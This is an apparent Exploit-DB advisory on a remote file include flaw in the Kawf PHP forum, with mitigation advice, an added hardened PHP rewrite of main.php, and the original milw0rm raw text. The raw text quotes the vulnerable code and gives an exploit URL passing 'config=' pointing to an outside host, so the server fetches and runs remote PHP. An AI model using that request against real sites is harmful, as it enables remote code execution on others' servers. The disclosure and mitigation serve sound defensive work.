Vendor: Kawf
By: str0ke
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Include
CWE: 98
Product Name: Kawf
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:kawf:kawf
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

kawf (config) Remote File Include

Kawf is a web forum written in PHP4 on MySQL; version 1.0 and all earlier releases are affected. The vulnerability is in main.php (user/account/main.php in the source tree): the script builds its include path from `$srcroot` and then calls `include_once("$config.inc")`, but never initialises `$config` or `$srcroot` itself. With PHP's register_globals enabled, both variables are populated from the request, so an attacker who supplies `config=` pointing at a URL under their control makes PHP fetch and execute that remote file as PHP code (the trailing `?` in the exploit URL turns the appended `.inc` into a query string of the remote request, so the attacker's file is fetched unchanged). Remote inclusion requires allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) to be on; with remote fetching disabled, the same parameter still lets an attacker include local files whose names end in `.inc`.

Mitigation:

Apply the vendor patch (a fix exists). Where patching is not immediately possible: set `register_globals = Off` so `$config`, `$srcroot` and `$include_append` can no longer be set from the request; set `allow_url_fopen = Off` (and `allow_url_include = Off` on PHP 5.2 and later) to block remote includes; and, in the code, initialise these variables explicitly and only ever build include paths from values checked against a fixed allowlist, never from raw user input.
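The following is an added example, not Kawf's own code or patch: a hardened rewrite of the main.php prologue quoted in the advisory below. It assumes PHP 7 or later and the install layout implied by the exploit path (kawf/user/account/main.php, with the `.inc` files under kawf/include); the allowlist contents and the `config-dev` name are illustrative. The point is that every path reaching `include_once()` is fixed by the code, and the only request-controlled value is an allowlisted name.

```php
<?php
// Added example (not Kawf's own code): hardened version of the main.php
// prologue from the advisory. Assumes PHP 7+ and the layout
// kawf/user/account/main.php with .inc files under kawf/include.
declare(strict_types=1);

// Anchor the install root to this file's location instead of to $srcroot,
// which the original left uninitialised and therefore (with register_globals
// on) settable by any client.
$srcroot = dirname(__DIR__, 2);   // kawf/user/account -> kawf

/**
 * Map an untrusted "config" request value onto a fixed allowlist of
 * configuration names. Returns the default when the parameter is absent and
 * throws on anything else, so no slash, dot, URL scheme or NUL byte can
 * reach include_once().
 */
function kawf_select_config(?string $requested, array $allowed, string $default = 'config'): string
{
    if ($requested === null || $requested === '') {
        return $default;
    }
    if (!in_array($requested, $allowed, true)) {
        throw new InvalidArgumentException('unknown configuration name');
    }
    return $requested;
}

/**
 * Resolve <baseDir>/<name>.inc to an absolute path and confirm it still lies
 * inside baseDir. realpath() returns false for URLs and for missing files,
 * which blocks remote inclusion and traversal to unexpected local files.
 */
function kawf_config_path(string $baseDir, string $name): string
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.inc');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('configuration file missing or outside ' . $baseDir);
    }
    return $path;
}

try {
    // Illustrative allowlist: only these two names are ever accepted.
    $config     = kawf_select_config($_GET['config'] ?? null, ['config', 'config-dev']);
    $configFile = kawf_config_path($srcroot . '/include', $config);
} catch (Exception $e) {
    http_response_code(400);
    exit('bad request');
}

// Same include sequence as the original, but the include path is built from
// the pinned $srcroot only; the request-controlled $include_append is gone.
set_include_path(implode(PATH_SEPARATOR, [
    $srcroot . '/include',
    $srcroot . '/user/account',
    get_include_path(),
]));

include_once $configFile;       // a vetted local file, never "$config.inc" from the query string
require_once 'sql.inc';
require_once 'util.inc';
require_once 'page.inc';
require_once 'forumuser.inc';

sql_open($database);            // $database is defined by the included config file
include 'index.php';
sql_close();
```

The code-level fix is independent of php.ini, but it is still worth keeping `register_globals = Off` and `allow_url_fopen = Off` (plus `allow_url_include = Off` on PHP 5.2 and later) as defence in depth: with those settings a forgotten `include("$var.inc")` elsewhere in the tree degrades from remote code execution to a local-file issue at worst.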

Exploit-DB raw data:

####################################################################
#       kawf (config)  Remote File Include
#---------------------------------------------------------------------------------------------
#       Kawf is a web forum written in PHP4 using MySQL
#        v. 1.0 and all below
#--------------------------------------------------------------------------------------------
#       download :
#       http://sourceforge.net/projects/kawf
#--------------------------------------------------------------------------------------------
#       see the bug file:
#       http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require
#--------------------------------------------------------------------------------------------
#       bug in  :
#       main.php
#--------------------------------------------------------------------------------------------
#code : { i wrote all code for str0ke :D :D } include in line 13 ::
#                                                       #
#                                                       /* First setup the path */
#                                                       $include_path = "$srcroot/include:$srcroot/user/account";
#                                                       if (isset($include_append))
#                                                         $include_path .= ":" . $include_append;
#
#                                                       $old_include_path = ini_get("include_path");
#                                                       if (!empty($old_include_path))
#                                                         $include_path .= ":" . $old_include_path;
#                                                       ini_set("include_path", $include_path);
#
#                                                       include_once("$config.inc");
#                                                       require_once("sql.inc");
#                                                       require_once("util.inc");
#                                                       require_once("page.inc");
#                                                       require_once("forumuser.inc");
#
#                                                       sql_open($database);
#
#                                                       include("index.php");
#
#                                                       sql_close();
#                                                       ?>
#--------------------------------------------------------------------------------------------
#       exploit:
#          kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#                                          or
#         (path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#--------------------------------------------------------------------------
#       greetz :  str0ke ,  c0ldz3r0 ,  all members in  xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D
#      inter_vieri_21 dont play runescape :d :d
#-------------------------------------------------------------------------
#      by o0xxdark0o
# i think... so that... i m here
#  o0xxdark0o@msn.com
####################################################################

# milw0rm.com [2006-10-21]